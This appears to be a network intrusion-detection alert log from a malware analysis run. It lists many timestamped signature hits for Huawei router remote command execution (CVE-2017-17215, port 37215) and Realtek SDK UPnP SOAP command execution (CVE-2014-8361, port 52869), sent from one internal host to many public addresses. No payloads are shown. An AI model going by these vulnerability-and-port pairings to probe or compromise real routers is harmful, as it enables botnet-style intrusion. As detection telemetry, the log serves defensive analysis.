                                                07/20/24-23:05:48.783693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5843637215192.168.2.1491.102.234.79
                                                07/20/24-23:06:11.551203TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4952852869192.168.2.14140.234.68.221
                                                07/20/24-23:06:13.609530TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614953052869192.168.2.14115.94.25.164
                                                07/20/24-23:05:36.061926TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613371452869192.168.2.14170.98.124.78
                                                07/20/24-23:05:39.062924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4532637215192.168.2.1441.167.241.255
                                                07/20/24-23:05:39.771399TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4198637215192.168.2.14179.244.27.199
                                                07/20/24-23:05:33.833027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4230637215192.168.2.14166.16.190.83
                                                07/20/24-23:05:46.014684TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5941637215192.168.2.1443.38.221.79
                                                07/20/24-23:05:34.627062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6069637215192.168.2.14157.227.113.44
                                                07/20/24-23:05:36.338927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5221437215192.168.2.14157.76.194.96
                                                07/20/24-23:05:58.198496TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5142052869192.168.2.1469.41.19.44
                                                07/20/24-23:05:33.830838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4209237215192.168.2.1441.209.69.235
                                                07/20/24-23:05:45.435097TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3434237215192.168.2.14197.107.175.122
                                                07/20/24-23:06:05.344794TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4994652869192.168.2.14182.114.119.16
                                                07/20/24-23:05:35.454256TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5107452869192.168.2.14149.79.37.237
                                                07/20/24-23:05:42.245742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4658237215192.168.2.1441.13.71.145
                                                07/20/24-23:06:16.438363TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4525237215192.168.2.14157.103.210.22
                                                07/20/24-23:05:38.002596TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5010452869192.168.2.144.234.130.62
                                                07/20/24-23:05:35.238802TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615836052869192.168.2.14137.134.252.4
                                                07/20/24-23:06:12.981585TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614366852869192.168.2.14207.229.71.38
                                                07/20/24-23:05:59.106701TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5936852869192.168.2.1452.18.183.9
                                                07/20/24-23:06:21.074396TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614192652869192.168.2.14150.55.177.42
                                                07/20/24-23:05:58.378138TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25596652869192.168.2.1485.33.92.254
                                                07/20/24-23:06:23.120505TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3516652869192.168.2.14167.116.191.121
                                                07/20/24-23:06:33.204459TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613314852869192.168.2.14110.56.95.238
                                                07/20/24-23:05:45.770020TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614644252869192.168.2.1451.1.181.74
                                                07/20/24-23:06:05.636118TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3358052869192.168.2.14136.96.92.41
                                                07/20/24-23:05:38.003393TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614189452869192.168.2.1454.48.74.242
                                                07/20/24-23:05:39.677506TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5182437215192.168.2.14157.204.36.35
                                                07/20/24-23:05:44.721858TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24203652869192.168.2.14190.251.113.36
                                                07/20/24-23:05:55.858612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3297837215192.168.2.14157.88.150.54
                                                07/20/24-23:05:37.453720TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4413452869192.168.2.1441.32.9.125
                                                07/20/24-23:06:14.645434TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4774852869192.168.2.14164.153.241.195
                                                07/20/24-23:05:37.464931TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24614252869192.168.2.1483.71.51.102
                                                07/20/24-23:06:54.482380TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614081052869192.168.2.14192.59.185.246
                                                07/20/24-23:06:11.607832TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614171252869192.168.2.14201.80.203.210
                                                07/20/24-23:05:57.122986TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25417052869192.168.2.14186.140.123.10
                                                07/20/24-23:05:35.158885TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615620652869192.168.2.14148.2.12.125
                                                07/20/24-23:05:57.781031TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5387452869192.168.2.1495.50.102.157
                                                07/20/24-23:06:03.111365TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615466652869192.168.2.14158.91.168.95
                                                07/20/24-23:05:58.834336TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23721252869192.168.2.1492.72.166.156
                                                07/20/24-23:06:01.876678TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613792252869192.168.2.14195.159.191.213
                                                07/20/24-23:05:35.204274TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614714452869192.168.2.1413.122.59.167
                                                07/20/24-23:06:09.741345TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5077252869192.168.2.14178.255.223.159
                                                07/20/24-23:06:12.350524TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615602652869192.168.2.14199.163.241.170
                                                07/20/24-23:06:09.742007TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5613252869192.168.2.14167.138.240.239
                                                07/20/24-23:05:42.188277TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3331837215192.168.2.1474.185.83.0
                                                07/20/24-23:06:13.793654TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4397452869192.168.2.14101.76.45.188
                                                07/20/24-23:05:56.120599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3621037215192.168.2.14157.140.175.112
                                                07/20/24-23:05:52.644108TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24765252869192.168.2.1479.120.206.7
                                                07/20/24-23:05:45.468009TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4369437215192.168.2.14201.239.149.144
                                                07/20/24-23:05:52.682403TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24677452869192.168.2.14105.215.161.3
                                                07/20/24-23:05:40.355569TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4975652869192.168.2.1468.41.73.225
                                                07/20/24-23:05:47.106820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4939437215192.168.2.14197.79.14.187
                                                07/20/24-23:05:58.382026TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613815052869192.168.2.1459.30.40.102
                                                07/20/24-23:05:48.801547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4154037215192.168.2.14157.183.80.133
                                                07/20/24-23:05:45.345649TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3572037215192.168.2.14197.72.11.79
                                                07/20/24-23:06:29.266425TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615080852869192.168.2.14165.192.185.217
                                                07/20/24-23:05:52.531304TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3999052869192.168.2.14176.236.240.152
                                                07/20/24-23:05:33.830272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4020237215192.168.2.14157.157.49.65
                                                07/20/24-23:05:50.522257TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4176037215192.168.2.14157.58.173.100
                                                07/20/24-23:05:47.129772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5008237215192.168.2.14197.179.199.215
                                                07/20/24-23:06:12.460952TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26031852869192.168.2.14144.88.71.215
                                                07/20/24-23:05:46.372687TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5855652869192.168.2.14106.160.141.160
                                                07/20/24-23:06:01.275898TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613527452869192.168.2.1427.99.183.157
                                                07/20/24-23:06:34.953106TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3792852869192.168.2.1461.217.120.125
                                                07/20/24-23:05:57.939285TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615905652869192.168.2.14213.166.217.247
                                                07/20/24-23:05:52.459685TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5773852869192.168.2.1463.16.203.38
                                                07/20/24-23:05:56.301028TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3824252869192.168.2.14203.90.117.81
                                                07/20/24-23:05:42.257476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3791237215192.168.2.14197.217.100.196
                                                07/20/24-23:05:58.821284TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3664052869192.168.2.14197.17.84.0
                                                07/20/24-23:06:01.813206TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5964052869192.168.2.14107.203.244.180
                                                07/20/24-23:05:39.035942TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3306637215192.168.2.1441.64.63.209
                                                07/20/24-23:05:57.973674TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615963252869192.168.2.1450.39.27.83
                                                07/20/24-23:05:59.031215TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3728452869192.168.2.1493.193.36.93
                                                07/20/24-23:05:34.657263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5270837215192.168.2.14130.150.233.95
                                                07/20/24-23:05:56.994750TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614901652869192.168.2.14129.7.141.158
                                                07/20/24-23:05:34.626588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6081237215192.168.2.14157.27.2.225
                                                07/20/24-23:06:02.474846TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23364852869192.168.2.14143.208.19.25
                                                07/20/24-23:07:02.655349TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613621852869192.168.2.1495.214.15.233
                                                07/20/24-23:05:50.557200TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5073037215192.168.2.1438.45.147.13
                                                07/20/24-23:05:52.475330TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5611452869192.168.2.1495.213.237.81
                                                07/20/24-23:05:57.211571TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5726252869192.168.2.14139.91.195.69
                                                07/20/24-23:05:59.139794TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24081852869192.168.2.14137.58.252.249
                                                07/20/24-23:06:08.403626TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5170252869192.168.2.14132.226.61.35
                                                07/20/24-23:05:40.330485TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24026252869192.168.2.14106.241.87.67
                                                07/20/24-23:05:33.830838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5997237215192.168.2.14155.221.192.136
                                                07/20/24-23:06:01.239423TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3670452869192.168.2.1468.116.156.72
                                                07/20/24-23:05:38.791586TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615793052869192.168.2.14187.211.186.240
                                                07/20/24-23:06:01.207184TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26040252869192.168.2.1464.219.147.54
                                                07/20/24-23:06:02.906267TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4394252869192.168.2.14106.37.253.180
                                                07/20/24-23:06:02.953099TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3787452869192.168.2.14189.235.177.109
                                                07/20/24-23:07:08.490661TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23408452869192.168.2.14145.10.127.230
                                                07/20/24-23:05:58.913916TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5503852869192.168.2.1462.147.245.113
                                                07/20/24-23:05:48.788274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3628037215192.168.2.14136.34.21.130
                                                07/20/24-23:05:39.060021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3316437215192.168.2.1441.47.234.152
                                                07/20/24-23:05:50.515904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5261037215192.168.2.1441.113.60.10
                                                07/20/24-23:05:56.351675TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5906252869192.168.2.14205.123.194.218
                                                07/20/24-23:05:57.526744TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5700652869192.168.2.14221.205.117.86
                                                07/20/24-23:05:45.392754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5174637215192.168.2.14197.159.113.203
                                                07/20/24-23:05:58.262546TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5049452869192.168.2.1451.105.4.160
                                                07/20/24-23:06:53.291407TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5692252869192.168.2.1471.172.2.131
                                                07/20/24-23:05:40.342827TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24696852869192.168.2.14105.51.193.210
                                                07/20/24-23:06:18.886041TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4215452869192.168.2.1454.94.45.4
                                                07/20/24-23:05:47.086079TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4364037215192.168.2.14157.216.181.223
                                                07/20/24-23:05:50.571555TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5391437215192.168.2.14197.103.230.8
                                                07/20/24-23:06:16.252148TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614231252869192.168.2.1424.18.34.232
                                                07/20/24-23:05:38.102642TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5098652869192.168.2.14100.202.15.240
                                                07/20/24-23:05:36.325662TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5726837215192.168.2.14197.199.66.253
                                                07/20/24-23:05:33.829338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4205037215192.168.2.14157.62.62.113
                                                07/20/24-23:06:16.651508TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613390252869192.168.2.14104.134.119.164
                                                07/20/24-23:05:52.633204TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25262252869192.168.2.1434.107.33.161
                                                07/20/24-23:05:59.239089TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614571452869192.168.2.14114.84.217.191
                                                07/20/24-23:05:36.324397TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4188237215192.168.2.14157.63.205.35
                                                07/20/24-23:05:58.240695TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23348052869192.168.2.14115.67.18.16
                                                07/20/24-23:05:52.445659TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4762252869192.168.2.14117.27.246.191
                                                07/20/24-23:05:47.105578TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3408637215192.168.2.14197.1.44.29
                                                07/20/24-23:06:58.157771TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25812652869192.168.2.1451.58.43.253
                                                07/20/24-23:05:37.450149TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23350852869192.168.2.14183.119.35.244
                                                07/20/24-23:06:18.694959TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4684852869192.168.2.1452.159.47.88
                                                07/20/24-23:05:35.556052TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5647652869192.168.2.14156.87.172.3
                                                07/20/24-23:06:02.125044TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24053852869192.168.2.1466.132.67.191
                                                07/20/24-23:05:56.922875TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5558052869192.168.2.14208.210.138.41
                                                07/20/24-23:05:38.614636TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613805252869192.168.2.1487.25.55.60
                                                07/20/24-23:05:56.119462TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4511037215192.168.2.14138.38.14.252
                                                07/20/24-23:05:46.557507TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615014652869192.168.2.14197.133.121.224
                                                07/20/24-23:05:42.131789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4453037215192.168.2.1441.165.59.46
                                                07/20/24-23:05:42.221844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4948437215192.168.2.1463.236.234.105
                                                07/20/24-23:05:56.430318TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3711037215192.168.2.14165.69.41.115
                                                07/20/24-23:05:42.145992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4059637215192.168.2.14157.206.32.150
                                                07/20/24-23:06:15.234951TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5761252869192.168.2.1451.62.238.64
                                                07/20/24-23:06:16.051223TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5154437215192.168.2.1441.234.183.206
                                                07/20/24-23:05:57.114018TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25812052869192.168.2.1437.110.135.88
                                                07/20/24-23:06:30.542349TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614176252869192.168.2.14168.170.27.252
                                                07/20/24-23:06:14.563767TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616076852869192.168.2.14114.127.42.181
                                                07/20/24-23:05:36.072925TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4632252869192.168.2.1434.247.156.202
                                                07/20/24-23:05:38.950380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5622237215192.168.2.1441.137.171.5
                                                07/20/24-23:06:24.267901TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4635652869192.168.2.14192.103.53.212
                                                07/20/24-23:05:34.659618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6064437215192.168.2.14106.240.47.148
                                                07/20/24-23:05:56.069521TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4838437215192.168.2.14197.66.223.70
                                                07/20/24-23:05:59.348370TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25124252869192.168.2.1460.207.166.164
                                                07/20/24-23:06:00.177523TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23525852869192.168.2.14173.6.68.101
                                                07/20/24-23:06:01.373997TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4166252869192.168.2.1473.142.223.114
                                                07/20/24-23:06:03.718240TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5655052869192.168.2.14162.196.84.240
                                                07/20/24-23:05:59.069869TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25572452869192.168.2.1423.176.211.236
                                                07/20/24-23:06:15.478723TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3402852869192.168.2.14190.26.67.211
                                                07/20/24-23:06:33.528209TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4964652869192.168.2.14146.85.252.85
                                                07/20/24-23:08:34.140430TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613736652869192.168.2.1453.65.45.168
                                                07/20/24-23:05:37.489811TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5278252869192.168.2.14119.83.111.97
                                                07/20/24-23:06:14.554681TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4471452869192.168.2.14206.201.63.188
                                                07/20/24-23:05:57.554556TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25638852869192.168.2.1432.221.18.235
                                                07/20/24-23:05:36.343632TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4831237215192.168.2.1432.2.223.204
                                                07/20/24-23:06:24.686159TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613385452869192.168.2.14113.244.48.233
                                                07/20/24-23:06:06.184196TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615172252869192.168.2.14143.136.242.167
                                                07/20/24-23:05:36.325662TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4083837215192.168.2.14197.125.103.179
                                                07/20/24-23:05:58.008667TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3372452869192.168.2.14102.91.220.41
                                                07/20/24-23:06:04.575596TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5366452869192.168.2.14218.158.30.202
                                                07/20/24-23:05:37.524062TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5850852869192.168.2.14220.224.214.129
                                                07/20/24-23:06:01.860812TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3969452869192.168.2.1458.146.126.203
                                                07/20/24-23:05:57.130961TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4622852869192.168.2.1444.81.94.227
                                                07/20/24-23:06:03.297548TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4913452869192.168.2.1491.181.24.50
                                                07/20/24-23:06:14.641445TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4018052869192.168.2.1499.220.176.209
                                                07/20/24-23:06:19.491493TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24361452869192.168.2.1435.37.174.94
                                                07/20/24-23:05:59.139794TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4081852869192.168.2.14137.58.252.249
                                                07/20/24-23:05:36.325773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4021237215192.168.2.14197.163.146.52
                                                07/20/24-23:05:45.205397TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4178252869192.168.2.14139.106.80.144
                                                07/20/24-23:06:06.269587TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25659252869192.168.2.1499.117.47.20
                                                07/20/24-23:05:38.191070TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4164652869192.168.2.14191.244.73.243
                                                07/20/24-23:06:02.199925TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3798052869192.168.2.1423.110.68.249
                                                07/20/24-23:06:00.927462TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614268252869192.168.2.14129.96.14.117
                                                07/20/24-23:06:09.594551TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5924852869192.168.2.14204.180.211.11
                                                07/20/24-23:05:35.245416TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4514252869192.168.2.1496.209.69.20
                                                07/20/24-23:05:48.858199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3510037215192.168.2.1441.151.51.214
                                                07/20/24-23:05:57.658473TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5142252869192.168.2.14108.229.127.235
                                                07/20/24-23:05:38.437028TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5563652869192.168.2.14223.214.5.89
                                                07/20/24-23:07:19.589495TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615382652869192.168.2.14199.195.114.2
                                                07/20/24-23:05:37.520621TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3514452869192.168.2.1479.15.211.18
